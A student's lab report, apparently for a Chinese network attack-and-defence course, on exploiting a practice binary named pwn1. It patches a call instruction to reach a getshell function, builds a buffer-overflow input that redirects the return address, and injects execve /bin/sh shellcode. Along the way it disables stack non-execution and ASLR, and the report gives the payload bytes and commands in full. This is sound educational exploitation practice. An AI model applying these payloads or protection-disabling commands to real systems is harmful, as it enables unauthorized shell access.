20155231 邵煜楠《网络对抗技术》实验一 PC平台逆向破解
实验内容
- 直接修改程序机器指令,改变程序执行流程;
- 通过构造输入参数,造成BOF攻击,改变程序执行流;
- 注入Shellcode并执行。
实验步骤
一:
下载目标文件pwn1,反汇编
利用objdump -d pwn1对pwn1进行反汇编;
- 用
vi pwn1打开pwn1; 利用
%!xxd将文件转换成16进制显示,利用/e8 d7ff ffff进行搜索将d7改为c3(计算“0804847d(getshell)-08048491(foo)+d7”得c3ffffff),利用%!xxd -r转回之前,再次进行反汇编;
二:
编辑输入为
perl -e ‘print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"‘ > input,可用
xxd input查看input,随后运行pwn1;
三:
- 输入下面的指令
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space- 构造输入
perl -e ‘print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"‘ > input_shellcode- 输入
(cat input_shellcode;cat) | ./pwn1,运行pwn1,然后打开顶一个终端,输入ps -ef | grep pwn1找到pwn1的进程号 - 输入
gdb,进入gdb调试,输入进程号 - 然后输入
info r,查看栈的地址 - 使用
x/16x 0xffffd33c查看其存放内容 - 由我们构造的input_shellcode可知,shellcode就在其后,修改为这个地址;
- 输入
重新构造inputperl -e ‘print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x10\xd3\xff\xff\x00"‘ > input_shellcode
